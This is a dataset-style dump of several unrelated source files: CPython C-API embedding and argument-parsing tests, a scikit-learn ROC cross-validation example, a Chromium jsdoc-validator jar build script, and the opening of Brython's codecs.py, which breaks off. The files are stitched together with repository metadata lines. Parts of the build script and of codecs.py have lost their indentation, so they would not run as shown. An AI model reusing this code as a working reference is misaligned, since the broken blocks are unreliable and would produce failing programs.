class EmbeddingTests(unittest.TestCase):
    """Drive the _testembed helper binary (embedded interpreter checks)."""

    def setUp(self):
        # Locate the _testembed executable next to the interpreter (Windows)
        # or in the Modules build directory (everywhere else).
        basepath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
        exename = "_testembed"
        if sys.platform.startswith("win"):
            ext = ("_d" if "_d" in sys.executable else "") + ".exe"
            exename += ext
            exepath = os.path.dirname(sys.executable)
        else:
            exepath = os.path.join(basepath, "Modules")
        self.test_exe = exe = os.path.join(exepath, exename)
        if not os.path.exists(exe):
            self.skipTest("%r doesn't exist" % exe)
        # This is needed otherwise we get a fatal error:
        # "Py_Initialize: Unable to get the locale encoding
        # LookupError: no codec search functions registered:  can't find encoding"
        self.oldcwd = os.getcwd()
        os.chdir(basepath)

    def tearDown(self):
        os.chdir(self.oldcwd)

    def run_embedded_interpreter(self, *args):
        """Runs a test in the embedded interpreter"""
        cmd = [self.test_exe]
        cmd.extend(args)
        p = subprocess.Popen(cmd,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        (out, err) = p.communicate()
        self.assertEqual(p.returncode, 0,
                         "bad returncode %d, stderr is %r" %
                         (p.returncode, err))
        return out.decode("latin1"), err.decode("latin1")

    def test_subinterps(self):
        # This is just a "don't crash" test
        out, err = self.run_embedded_interpreter()
        if support.verbose:
            print()
            print(out)
            print(err)

    @staticmethod
    def _get_default_pipe_encoding():
        # Encoding a freshly-opened pipe gets by default on this platform.
        rp, wp = os.pipe()
        try:
            with os.fdopen(wp, 'w') as w:
                default_pipe_encoding = w.encoding
        finally:
            os.close(rp)
        return default_pipe_encoding

    def test_forced_io_encoding(self):
        # Checks forced configuration of embedded interpreter IO streams
        out, err = self.run_embedded_interpreter("forced_io_encoding")
        if support.verbose:
            print()
            print(out)
            print(err)
        expected_stdin_encoding = sys.__stdin__.encoding
        expected_pipe_encoding = self._get_default_pipe_encoding()
        # NOTE: this expected text must match _testembed.c exactly.
        expected_output = os.linesep.join([
        "--- Use defaults ---",
        "Expected encoding: default",
        "Expected errors: default",
        "stdin: {0}:strict",
        "stdout: {1}:strict",
        "stderr: {1}:backslashreplace",
        "--- Set errors only ---",
        "Expected encoding: default",
        "Expected errors: surrogateescape",
        "stdin: {0}:surrogateescape",
        "stdout: {1}:surrogateescape",
        "stderr: {1}:backslashreplace",
        "--- Set encoding only ---",
        "Expected encoding: latin-1",
        "Expected errors: default",
        "stdin: latin-1:strict",
        "stdout: latin-1:strict",
        "stderr: latin-1:backslashreplace",
        "--- Set encoding and errors ---",
        "Expected encoding: latin-1",
        "Expected errors: surrogateescape",
        "stdin: latin-1:surrogateescape",
        "stdout: latin-1:surrogateescape",
        "stderr: latin-1:backslashreplace"]).format(expected_stdin_encoding,
                                                    expected_pipe_encoding)
        # This is useful if we ever trip over odd platform behaviour
        self.maxDiff = None
        self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
    """Parity check between getargs.c's convertsimple() and skipitem()."""

    def test_skipitem(self):
        """
        If this test failed, you probably added a new "format unit"
        in Python/getargs.c, but neglected to update our poor friend
        skipitem() in the same file.  (If so, shame on you!)

        With a few exceptions**, this function brute-force tests all
        printable ASCII*** characters (32 to 126 inclusive) as format units,
        checking to see that PyArg_ParseTupleAndKeywords() return consistent
        errors both when the unit is attempted to be used and when it is
        skipped.  If the format unit doesn't exist, we'll get one of two
        specific error messages (one for used, one for skipped); if it does
        exist we *won't* get that error--we'll get either no error or some
        other error.  If we get the specific "does not exist" error for one
        test and not for the other, there's a mismatch, and the test fails.

        ** Some format units have special funny semantics and it would
           be difficult to accomodate them here.  Since these are all
           well-established and properly skipped in skipitem() we can
           get away with not testing them--this test is really intended
           to catch *new* format units.

        *** Python C source files must be ASCII.  Therefore it's impossible
            to have non-ASCII format units.
        """
        empty_tuple = ()
        tuple_1 = (0,)
        dict_b = {'b':1}
        keywords = ["a", "b"]

        for i in range(32, 127):
            c = chr(i)

            # skip parentheses, the error reporting is inconsistent about them
            # skip 'e', it's always a two-character code
            # skip '|' and '$', they don't represent arguments anyway
            if c in '()e|$':
                continue

            # test the format unit when not skipped
            format = c + "i"
            try:
                # (note: the format string must be bytes!)
                _testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
                    format.encode("ascii"), keywords)
                when_not_skipped = False
            except TypeError as e:
                s = "argument 1 must be impossible<bad format char>, not int"
                when_not_skipped = (str(e) == s)
            except RuntimeError as e:
                when_not_skipped = False

            # test the format unit when skipped
            optional_format = "|" + format
            try:
                _testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
                    optional_format.encode("ascii"), keywords)
                when_skipped = False
            except RuntimeError as e:
                s = "impossible<bad format char>: '{}'".format(format)
                when_skipped = (str(e) == s)

            message = ("test_skipitem_parity: "
                "detected mismatch between convertsimple and skipitem "
                "for format unit '{}' ({}), not skipped {}, skipped {}".format(
                    c, i, when_skipped, when_not_skipped))
            self.assertIs(when_skipped, when_not_skipped, message)

    def test_parse_tuple_and_keywords(self):
        # parse_tuple_and_keywords error handling tests
        self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
                          (), {}, 42, [])
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, b'', 42)
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, b'', [''] * 42)
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):

    @support.reap_threads
    def test_thread_state(self):
        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []

            def callback():
                idents.append(threading.get_ident())

            _testcapi._test_thread_state(callback)
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(threading.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")

        # Run once on the current thread, then once on a fresh thread so
        # both code paths through the C-level thread-state handling run.
        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
class Test_testcapi(unittest.TestCase):
    """Run every self-test the _testcapi extension exports."""

    def test__testcapi(self):
        # The C extension exposes its internal checks as callables whose
        # names start with 'test_'; invoke each under a subTest so a
        # failure pinpoints the exact C-level check.
        internal_names = (n for n in dir(_testcapi) if n.startswith('test_'))
        for name in internal_names:
            with self.subTest("internal", name=name):
                getattr(_testcapi, name)()
# Allow running the suite directly: python test_capi.py
if __name__ == "__main__":
    unittest.main()
| gpl-3.0 |
marcocaccin/scikit-learn | examples/model_selection/plot_roc_crossval.py | 247 | 3253 | """
=============================================================
Receiver Operating Characteristic (ROC) with cross validation
=============================================================

Example of Receiver Operating Characteristic (ROC) metric to evaluate
classifier output quality using cross-validation.

ROC curves typically feature true positive rate on the Y axis, and false
positive rate on the X axis. This means that the top left corner of the plot is
the "ideal" point - a false positive rate of zero, and a true positive rate of
one. This is not very realistic, but it does mean that a larger area under the
curve (AUC) is usually better.

The "steepness" of ROC curves is also important, since it is ideal to maximize
the true positive rate while minimizing the false positive rate.

This example shows the ROC response of different datasets, created from K-fold
cross-validation. Taking all of these curves, it is possible to calculate the
mean area under curve, and see the variance of the curve when the
training set is split into different subsets. This roughly shows how the
classifier output is affected by changes in the training data, and how
different the splits generated by K-fold cross-validation are from one another.

.. note::

    See also :func:`sklearn.metrics.auc_score`,
             :func:`sklearn.cross_validation.cross_val_score`,
             :ref:`example_model_selection_plot_roc.py`,

"""
print(__doc__)

import numpy as np
from scipy import interp
import matplotlib.pyplot as plt

from sklearn import svm, datasets
from sklearn.metrics import roc_curve, auc
from sklearn.cross_validation import StratifiedKFold

###############################################################################
# Data IO and generation

# import some data to play with
iris = datasets.load_iris()
X = iris.data
y = iris.target
# Keep only two classes so the problem is binary.
X, y = X[y != 2], y[y != 2]
n_samples, n_features = X.shape

# Add noisy features
random_state = np.random.RandomState(0)
X = np.c_[X, random_state.randn(n_samples, 200 * n_features)]

###############################################################################
# Classification and ROC analysis

# Run classifier with cross-validation and plot ROC curves
cv = StratifiedKFold(y, n_folds=6)
classifier = svm.SVC(kernel='linear', probability=True,
                     random_state=random_state)

mean_tpr = 0.0
mean_fpr = np.linspace(0, 1, 100)
all_tpr = []

for i, (train, test) in enumerate(cv):
    probas_ = classifier.fit(X[train], y[train]).predict_proba(X[test])
    # Compute ROC curve and area the curve
    fpr, tpr, thresholds = roc_curve(y[test], probas_[:, 1])
    # Interpolate each fold's curve onto a common FPR grid so the mean
    # curve can be computed point-wise.
    mean_tpr += interp(mean_fpr, fpr, tpr)
    mean_tpr[0] = 0.0
    roc_auc = auc(fpr, tpr)
    plt.plot(fpr, tpr, lw=1, label='ROC fold %d (area = %0.2f)' % (i, roc_auc))

plt.plot([0, 1], [0, 1], '--', color=(0.6, 0.6, 0.6), label='Luck')

mean_tpr /= len(cv)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
plt.plot(mean_fpr, mean_tpr, 'k--',
         label='Mean ROC (area = %0.2f)' % mean_auc, lw=2)

plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic example')
plt.legend(loc="lower right")
plt.show()
| bsd-3-clause |
ahmadassaf/Chrome-devtools-app | app/devtools/scripts/jsdoc-validator/build_jsdoc_validator_jar.py | 66 | 5099 | #!/usr/bin/python
import hashlib
import operator
import os
import shutil
import stat
import subprocess
import sys
import tempfile
def rel_to_abs(rel_path):
    # Resolve rel_path against the directory containing this script
    # (script_path is assigned at module level, after this def but before
    # any call).
    return os.path.join(script_path, rel_path)
java_bin_path = os.getenv('JAVA_HOME', '')
if java_bin_path:
java_bin_path = os.path.join(java_bin_path, 'bin')
main_class = 'org.chromium.devtools.jsdoc.JsDocValidator'
jar_name = 'jsdoc-validator.jar'
hashes_name = 'hashes'
src_dir = 'src'
script_path = os.path.dirname(os.path.abspath(__file__))
closure_jar_relpath = os.path.join('..', 'closure', 'compiler.jar')
src_path = rel_to_abs(src_dir)
hashes_path = rel_to_abs(hashes_name)
def get_file_hash(file, blocksize=65536):
    # Return the SHA-256 hex digest of an open file object, reading it in
    # blocksize-byte chunks so large files never have to fit in memory.
    digest = hashlib.sha256()
    while True:
        chunk = file.read(blocksize)
        if not chunk:
            break
        digest.update(chunk)
    return digest.hexdigest()
def traverse(hasher, path):
    # Feed a stable textual description of the tree rooted at `path` into
    # hasher.  Directories are visited in sorted order so the resulting
    # digest is reproducible across platforms and filesystems.
    abs_path = rel_to_abs(path)
    info = os.lstat(abs_path)
    # Normalize Windows separators so the digest is path-separator agnostic.
    quoted_name = repr(path.replace('\\', '/'))
    if stat.S_ISDIR(info.st_mode) and not os.path.basename(path).startswith('.'):
        # Directory entry (hidden dot-directories are skipped entirely).
        hasher.update('d ' + quoted_name + '\n')
        for entry in sorted(os.listdir(abs_path)):
            traverse(hasher, os.path.join(path, entry))
    elif stat.S_ISREG(info.st_mode) and path.endswith('.java'):
        # Regular .java source: record name, size and content digest.
        hasher.update('r ' + quoted_name + ' ')
        hasher.update(str(info.st_size) + ' ')
        # 'U' = universal newlines, so CRLF and LF checkouts hash identically
        # (Python 2 idiom; 'U' mode no longer exists in Python 3).
        with open(abs_path, 'Ur') as file:
            f_hash = get_file_hash(file)
        hasher.update(f_hash + '\n')
def get_src_dir_hash(dir):
    # Aggregate digest of the whole source tree rooted at `dir`.
    hasher = hashlib.sha256()
    traverse(hasher, dir)
    return hasher.hexdigest()
def get_actual_hashes():
    # Compute the current digests: one per tracked artifact file plus one
    # aggregate digest for the whole src/ tree.
    hashed_files = [(jar_name, True)]
    hashes = {}
    for (file_name, binary) in hashed_files:
        try:
            hash = get_file_hash(open(file_name, 'rb' if binary else 'r'))
            hashes[file_name] = hash
        except IOError:
            # Missing artifact (e.g. first build): record a sentinel that can
            # never match a real digest, which forces a rebuild.
            hashes[file_name] = '0'
    hashes[src_dir] = get_src_dir_hash(src_dir)
    return hashes
def get_expected_hashes():
    # Parse the recorded hashes file into {file_name: hash}.  Each line has
    # the form '<hash> <name>'.  Returns None when the file is missing or
    # malformed, which callers treat as "everything modified".
    try:
        with open(hashes_path, 'r') as file:
            hashes = {}
            for line in file:
                hash, name = line.split(' ', 1)
                hashes[name.strip()] = hash.strip()
            return hashes
    except Exception:
        # Was a bare `except:`, which would also swallow KeyboardInterrupt
        # and SystemExit; Exception still covers IOError and parse errors.
        return None
def run_and_communicate(command, error_template):
    # Run `command` through the shell, wait for completion and discard its
    # stdout; on a non-zero exit, report via error_template and abort.
    # NOTE(review): shell=True with an interpolated command string is
    # injection-prone if any path contains shell metacharacters -- paths here
    # come from the local checkout, but confirm before reusing elsewhere.
    proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
    proc.communicate()
    if proc.returncode:
        print >> sys.stderr, error_template % proc.returncode
        sys.exit(proc.returncode)
def build_artifacts():
    # Compile every .java file under src/ and package the classes into the
    # jsdoc-validator jar, with a manifest Class-Path pointing at the Closure
    # compiler jar.
    print 'Compiling...'
    java_files = []
    for root, dirs, files in sorted(os.walk(src_path)):
        for file_name in files:
            if file_name.endswith('.java'):
                java_files.append(os.path.join(root, file_name))

    bin_path = tempfile.mkdtemp()
    # delete=False: the file must survive close() so `jar` can read it below.
    manifest_file = tempfile.NamedTemporaryFile(mode='wt', delete=False)
    try:
        # The jar locates compiler.jar relative to its own location.
        manifest_file.write('Class-Path: %s\n' % closure_jar_relpath)
        manifest_file.close()

        javac_path = os.path.join(java_bin_path, 'javac')
        javac_command = '%s -d %s -cp %s %s' % (javac_path, bin_path, rel_to_abs(closure_jar_relpath), ' '.join(java_files))
        run_and_communicate(javac_command, 'Error: javac returned %d')

        print 'Building jar...'
        artifact_path = rel_to_abs(jar_name)
        jar_path = os.path.join(java_bin_path, 'jar')
        # cvfme = create, verbose, output file, manifest file, entry point.
        jar_command = '%s cvfme %s %s %s -C %s .' % (jar_path, artifact_path, manifest_file.name, main_class, bin_path)
        run_and_communicate(jar_command, 'Error: jar returned %d')
    finally:
        # Always clean up the temporary manifest and class directory.
        os.remove(manifest_file.name)
        shutil.rmtree(bin_path, True)
def update_hashes():
    # Rewrite the hashes file with the current jar and source-tree digests,
    # one '<hash> <name>' entry per line (the format get_expected_hashes()
    # parses back).
    print 'Updating hashes...'
    with open(hashes_path, 'w') as file:
        file.writelines(['%s %s\n' % (hash, name) for (name, hash) in get_actual_hashes().iteritems()])
def hashes_modified():
    # Return a list of (name, expected, actual) triples for every entry whose
    # recorded hash differs from the current one.  An empty list means
    # nothing changed; when no expected hashes exist at all, a single
    # sentinel triple is returned so callers see "modified".
    expected = get_expected_hashes()
    if not expected:
        return [('<no expected hashes>', 1, 0)]
    actual = get_actual_hashes()
    return [(name, expected_hash, actual.get(name))
            for name, expected_hash in expected.iteritems()
            if expected_hash != actual.get(name)]
def help():
    # Print CLI usage.  (Shadows the help() builtin, which this script never
    # uses interactively.)
    print 'usage: %s [option]' % os.path.basename(__file__)
    print 'Options:'
    print '--force-rebuild: Rebuild classes and jar even if there are no source file changes'
    print '--no-rebuild: Do not rebuild jar, just update hashes'
def main():
    # Entry point: decide whether to rebuild based on the (single) CLI flag
    # and on whether any tracked hash differs from the recorded one.
    no_rebuild = False
    force_rebuild = False

    if len(sys.argv) > 1:
        if sys.argv[1] == '--help':
            help()
            return
        no_rebuild = sys.argv[1] == '--no-rebuild'
        force_rebuild = sys.argv[1] == '--force-rebuild'

    if not hashes_modified() and not force_rebuild:
        print 'No modifications found, rebuild not required.'
        return
    if not no_rebuild:
        build_artifacts()

    # Record the new state even when only hashes are refreshed (--no-rebuild).
    update_hashes()
    print 'Done.'
if __name__ == '__main__':
main()
| mit |
jperon/musite | static/js/brython/Lib/codecs.py | 739 | 35436 | """ codecs -- Python Codec Registry, API and helpers.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""#"
import builtins, sys
### Registry and builtin stateless codec functions
try:
from _codecs import *
except ImportError as why:
raise SystemError('Failed to load the builtin codecs: %s' % why)
__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",
"BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",
"BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",
"BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",
"strict_errors", "ignore_errors", "replace_errors",
"xmlcharrefreplace_errors",
"register_error", "lookup_error"]
### Constants
#
# Byte Order Mark (BOM = ZERO WIDTH NO-BREAK SPACE = U+FEFF)
# and its possible byte string values
# for UTF8/UTF16/UTF32 output and little/big endian machines
#
# UTF-8
BOM_UTF8 = b'\xef\xbb\xbf'
# UTF-16, little endian
BOM_LE = BOM_UTF16_LE = b'\xff\xfe'
# UTF-16, big endian
BOM_BE = BOM_UTF16_BE = b'\xfe\xff'
# UTF-32, little endian
BOM_UTF32_LE = b'\xff\xfe\x00\x00'
# UTF-32, big endian
BOM_UTF32_BE = b'\x00\x00\xfe\xff'
if sys.byteorder == 'little':
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_LE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_LE
else:
# UTF-16, native endianness
BOM = BOM_UTF16 = BOM_UTF16_BE
# UTF-32, native endianness
BOM_UTF32 = BOM_UTF32_BE
# Old broken names (don't use in new code)
BOM32_LE = BOM_UTF16_LE
BOM32_BE = BOM_UTF16_BE
BOM64_LE = BOM_UTF32_LE
BOM64_BE = BOM_UTF32_BE
### Codec base classes (defining the API)
class CodecInfo(tuple):
    # Codec details returned by codecs.lookup(): behaves like the legacy
    # 4-tuple (encode, decode, streamreader, streamwriter) while also
    # carrying the incremental codec factories and the codec name as
    # attributes.

    def __new__(cls, encode, decode, streamreader=None, streamwriter=None,
        incrementalencoder=None, incrementaldecoder=None, name=None):
        # The tuple layout is fixed for backward compatibility with code that
        # unpacks the result of codecs.lookup().
        self = tuple.__new__(cls, (encode, decode, streamreader, streamwriter))
        self.name = name
        self.encode = encode
        self.decode = decode
        self.incrementalencoder = incrementalencoder
        self.incrementaldecoder = incrementaldecoder
        self.streamwriter = streamwriter
        self.streamreader = streamreader
        return self

    def __repr__(self):
        return "<%s.%s object for encoding %s at 0x%x>" % \
                (self.__class__.__module__, self.__class__.__name__,
                 self.name, id(self))
class Codec:
    """Abstract base class for stateless encoders/decoders.

    Subclasses implement encode() and decode().  Both accept an ``errors``
    argument selecting an error-handling scheme; the predefined values are
    'strict' (raise a ValueError or subclass), 'ignore', 'replace',
    'surrogateescape', 'xmlcharrefreplace' (encoding only) and
    'backslashreplace' (encoding only).  Additional handlers can be added
    via register_error().
    """

    def encode(self, input, errors='strict'):
        """Encode ``input``; return (output object, length consumed).

        Implementations must be stateless (use StreamCodec for codecs that
        need state) and must accept zero-length input, returning an empty
        object of the output type for it.
        """
        raise NotImplementedError

    def decode(self, input, errors='strict'):
        """Decode ``input``; return (output object, length consumed).

        ``input`` must expose a read buffer (e.g. bytes, buffer objects,
        memory-mapped files).  Implementations must be stateless and must
        accept zero-length input, returning an empty object of the output
        type for it.
        """
        raise NotImplementedError
class IncrementalEncoder(object):
    """Encode an input in multiple steps.

    Pieces of the input are passed to successive encode() calls; the
    encoder keeps whatever state it needs between calls.
    """

    def __init__(self, errors='strict'):
        """Create an IncrementalEncoder.

        ``errors`` selects the error-handling scheme (see the module
        docstring for the predefined values).
        """
        self.errors = errors
        self.buffer = ""

    def encode(self, input, final=False):
        """Encode ``input`` and return the resulting object."""
        raise NotImplementedError

    def reset(self):
        """Reset the encoder to its initial state."""

    def getstate(self):
        """Return the current state of the encoder."""
        return 0

    def setstate(self, state):
        """Restore a state previously returned by getstate()."""
class BufferedIncrementalEncoder(IncrementalEncoder):
    """Base class for incremental encoders that must buffer pending input
    between calls to encode()."""

    def __init__(self, errors='strict'):
        IncrementalEncoder.__init__(self, errors)
        self.buffer = ""  # input not yet consumed by _buffer_encode()

    def _buffer_encode(self, input, errors, final):
        # Subclasses encode ``input`` and return (output, length consumed).
        raise NotImplementedError

    def encode(self, input, final=False):
        """Encode ``input``, prepending any input left over from earlier
        calls; whatever _buffer_encode() does not consume is kept for the
        next call."""
        pending = self.buffer + input
        result, consumed = self._buffer_encode(pending, self.errors, final)
        self.buffer = pending[consumed:]
        return result

    def reset(self):
        IncrementalEncoder.reset(self)
        self.buffer = ""

    def getstate(self):
        # An empty buffer is reported as the integer 0 (the initial state).
        return self.buffer or 0

    def setstate(self, state):
        self.buffer = state or ""
class IncrementalDecoder(object):
    """Decode an input in multiple steps.

    Pieces of the input are passed to successive decode() calls; the
    decoder keeps whatever state it needs between calls.
    """

    def __init__(self, errors='strict'):
        """Create an IncrementalDecoder.

        ``errors`` selects the error-handling scheme (see the module
        docstring for the predefined values).
        """
        self.errors = errors

    def decode(self, input, final=False):
        """Decode ``input`` and return the resulting object."""
        raise NotImplementedError

    def reset(self):
        """Reset the decoder to its initial state."""

    def getstate(self):
        """Return (buffered_input, additional_state_info).

        ``buffered_input`` is a bytes object holding input passed to
        decode() but not yet converted.  ``additional_state_info`` is a
        non-negative integer describing the decoder state *before*
        buffered_input is processed.  In the initial state and after
        reset() this must be (b"", 0).
        """
        return (b"", 0)

    def setstate(self, state):
        """Restore a state previously returned by getstate().

        setstate((b"", 0)) must be equivalent to reset().
        """
class BufferedIncrementalDecoder(IncrementalDecoder):
    """Base class for incremental decoders that must handle incomplete
    byte sequences by buffering them between calls to decode()."""

    def __init__(self, errors='strict'):
        IncrementalDecoder.__init__(self, errors)
        self.buffer = b""  # bytes not yet consumed by _buffer_decode()

    def _buffer_decode(self, input, errors, final):
        # Subclasses decode ``input`` and return (output, length consumed).
        raise NotImplementedError

    def decode(self, input, final=False):
        """Decode ``input``, prepending any bytes left over from earlier
        calls; whatever _buffer_decode() does not consume is kept for the
        next call."""
        pending = self.buffer + input
        result, consumed = self._buffer_decode(pending, self.errors, final)
        self.buffer = pending[consumed:]
        return result

    def reset(self):
        IncrementalDecoder.reset(self)
        self.buffer = b""

    def getstate(self):
        # The additional state info is always 0 for buffered decoders.
        return (self.buffer, 0)

    def setstate(self, state):
        # Only the buffered bytes are meaningful; the extra info is ignored.
        self.buffer = state[0]
#
# The StreamWriter and StreamReader class provide generic working
# interfaces which can be used to implement new encoding submodules
# very easily. See encodings/utf_8.py for an example on how this is
# done.
#
class StreamWriter(Codec):
    """Write encoded data to a stream.

    ``stream`` must be a file-like object open for writing (binary) data.
    ``errors`` selects the error-handling scheme; predefined values are
    'strict' (raise a ValueError or subclass), 'ignore', 'replace',
    'xmlcharrefreplace' and 'backslashreplace'.  More can be added via
    register_error().
    """

    def __init__(self, stream, errors='strict'):
        self.stream = stream
        self.errors = errors

    def write(self, object):
        """Encode ``object`` and write the result to the stream."""
        data, consumed = self.encode(object, self.errors)
        self.stream.write(data)

    def writelines(self, list):
        """Write a list of strings to the stream via a single write()."""
        self.write(''.join(list))

    def reset(self):
        """Flush and reset any codec buffers.

        After this call fresh data can be appended without rescanning the
        stream to recover state; stateless writers need not do anything.
        """
        pass

    def seek(self, offset, whence=0):
        self.stream.seek(offset, whence)
        # Rewinding to the very start discards any pending encoder state.
        if whence == 0 and offset == 0:
            self.reset()

    def __getattr__(self, name,
                    getattr=getattr):
        """Delegate all other attribute lookups to the underlying stream."""
        return getattr(self.stream, name)

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
###
class StreamReader(Codec):
    # Reads encoded data from a stream and hands out decoded characters.
    # Maintains three layers of buffering: undecoded bytes (bytebuffer),
    # decoded-but-undelivered characters (charbuffer) and, for readline(),
    # a cache of pre-split lines (linebuffer).

    # Factory for the character buffer type; subclasses may override.
    charbuffertype = str

    def __init__(self, stream, errors='strict'):
        """ Creates a StreamReader instance.

            stream must be a file-like object open for reading
            (binary) data.

            The StreamReader may use different error handling
            schemes by providing the errors keyword argument. These
            parameters are predefined:

             'strict' - raise a ValueError (or a subclass)
             'ignore' - ignore the character and continue with the next
             'replace'- replace with a suitable replacement character;

            The set of allowed parameter values can be extended via
            register_error.
        """
        self.stream = stream
        self.errors = errors
        # Undecoded bytes carried over between read() calls.
        self.bytebuffer = b""
        self._empty_charbuffer = self.charbuffertype()
        # Decoded characters not yet handed out to the caller.
        self.charbuffer = self._empty_charbuffer
        # Pre-split lines cached by readline(); None while unused.
        self.linebuffer = None

    def decode(self, input, errors='strict'):
        raise NotImplementedError

    def read(self, size=-1, chars=-1, firstline=False):
        """ Decodes data from the stream self.stream and returns the
            resulting object.

            chars indicates the number of characters to read from the
            stream. read() will never return more than chars
            characters, but it might return less, if there are not enough
            characters available.

            size indicates the approximate maximum number of bytes to
            read from the stream for decoding purposes. The decoder
            can modify this setting as appropriate. The default value
            -1 indicates to read and decode as much as possible. size
            is intended to prevent having to decode huge files in one
            step.

            If firstline is true, and a UnicodeDecodeError happens
            after the first line terminator in the input only the first line
            will be returned, the rest of the input will be kept until the
            next call to read().

            The method should use a greedy read strategy meaning that
            it should read as much data as is allowed within the
            definition of the encoding and the given size, e.g.  if
            optional encoding endings or state markers are available
            on the stream, these should be read too.
        """
        # If we have lines cached, first merge them back into characters
        if self.linebuffer:
            self.charbuffer = self._empty_charbuffer.join(self.linebuffer)
            self.linebuffer = None

        # read until we get the required number of characters (if available)
        while True:
            # can the request be satisfied from the character buffer?
            if chars < 0:
                if size < 0:
                    if self.charbuffer:
                        break
                elif len(self.charbuffer) >= size:
                    break
            else:
                if len(self.charbuffer) >= chars:
                    break
            # we need more data
            if size < 0:
                newdata = self.stream.read()
            else:
                newdata = self.stream.read(size)
            # decode bytes (those remaining from the last call included)
            data = self.bytebuffer + newdata
            try:
                newchars, decodedbytes = self.decode(data, self.errors)
            except UnicodeDecodeError as exc:
                if firstline:
                    # Decode only up to the error; if that still yields at
                    # least one full line, readline() can use it.
                    newchars, decodedbytes = \
                        self.decode(data[:exc.start], self.errors)
                    lines = newchars.splitlines(keepends=True)
                    if len(lines)<=1:
                        raise
                else:
                    raise
            # keep undecoded bytes until the next call
            self.bytebuffer = data[decodedbytes:]
            # put new characters in the character buffer
            self.charbuffer += newchars
            # there was no data available
            if not newdata:
                break
        if chars < 0:
            # Return everything we've got
            result = self.charbuffer
            self.charbuffer = self._empty_charbuffer
        else:
            # Return the first chars characters
            result = self.charbuffer[:chars]
            self.charbuffer = self.charbuffer[chars:]
        return result

    def readline(self, size=None, keepends=True):
        """ Read one line from the input stream and return the
            decoded data.

            size, if given, is passed as size argument to the
            read() method.
        """
        # If we have lines cached from an earlier read, return
        # them unconditionally
        if self.linebuffer:
            line = self.linebuffer[0]
            del self.linebuffer[0]
            if len(self.linebuffer) == 1:
                # revert to charbuffer mode; we might need more data
                # next time
                self.charbuffer = self.linebuffer[0]
                self.linebuffer = None
            if not keepends:
                line = line.splitlines(keepends=False)[0]
            return line

        readsize = size or 72
        line = self._empty_charbuffer
        # If size is given, we call read() only once
        while True:
            data = self.read(readsize, firstline=True)
            if data:
                # If we're at a "\r" read one extra character (which might
                # be a "\n") to get a proper line ending. If the stream is
                # temporarily exhausted we return the wrong line ending.
                if (isinstance(data, str) and data.endswith("\r")) or \
                   (isinstance(data, bytes) and data.endswith(b"\r")):
                    data += self.read(size=1, chars=1)

            line += data
            lines = line.splitlines(keepends=True)
            if lines:
                if len(lines) > 1:
                    # More than one line result; the first line is a full line
                    # to return
                    line = lines[0]
                    del lines[0]
                    if len(lines) > 1:
                        # cache the remaining lines
                        lines[-1] += self.charbuffer
                        self.linebuffer = lines
                        self.charbuffer = None
                    else:
                        # only one remaining line, put it back into charbuffer
                        self.charbuffer = lines[0] + self.charbuffer
                    if not keepends:
                        line = line.splitlines(keepends=False)[0]
                    break
                line0withend = lines[0]
                line0withoutend = lines[0].splitlines(keepends=False)[0]
                if line0withend != line0withoutend: # We really have a line end
                    # Put the rest back together and keep it until the next call
                    self.charbuffer = self._empty_charbuffer.join(lines[1:]) + \
                                      self.charbuffer
                    if keepends:
                        line = line0withend
                    else:
                        line = line0withoutend
                    break
            # we didn't get anything or this was our only try
            if not data or size is not None:
                if line and not keepends:
                    line = line.splitlines(keepends=False)[0]
                break
            # Grow the read size (up to a cap) so long lines need few reads.
            if readsize < 8000:
                readsize *= 2
        return line

    def readlines(self, sizehint=None, keepends=True):
        """ Read all lines available on the input stream
            and return them as list of lines.

            Line breaks are implemented using the codec's decoder
            method and are included in the list entries.

            sizehint, if given, is ignored since there is no efficient
            way to finding the true end-of-line.
        """
        data = self.read()
        return data.splitlines(keepends)

    def reset(self):
        """ Resets the codec buffers used for keeping state.

            Note that no stream repositioning should take place.
            This method is primarily intended to be able to recover
            from decoding errors.
        """
        self.bytebuffer = b""
        self.charbuffer = self._empty_charbuffer
        self.linebuffer = None

    def seek(self, offset, whence=0):
        """ Set the input stream's current position.

            Resets the codec buffers used for keeping state.
        """
        self.stream.seek(offset, whence)
        self.reset()

    def __next__(self):
        """ Return the next decoded line from the input stream."""
        line = self.readline()
        if line:
            return line
        raise StopIteration

    def __iter__(self):
        return self

    def __getattr__(self, name,
                    getattr=getattr):
        """ Inherit all other methods from the underlying stream.
        """
        return getattr(self.stream, name)

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
###
class StreamReaderWriter:
    """Wrap a stream that works in both read and write mode.

    ``Reader`` and ``Writer`` are StreamReader/StreamWriter factories,
    typically the ones returned by codecs.lookup().  Error handling is the
    same as for StreamWriter/StreamReader.  Unknown attributes are delegated
    to the wrapped stream.
    """

    # Optional attribute set by the file wrappers below (see codecs.open()).
    encoding = 'unknown'

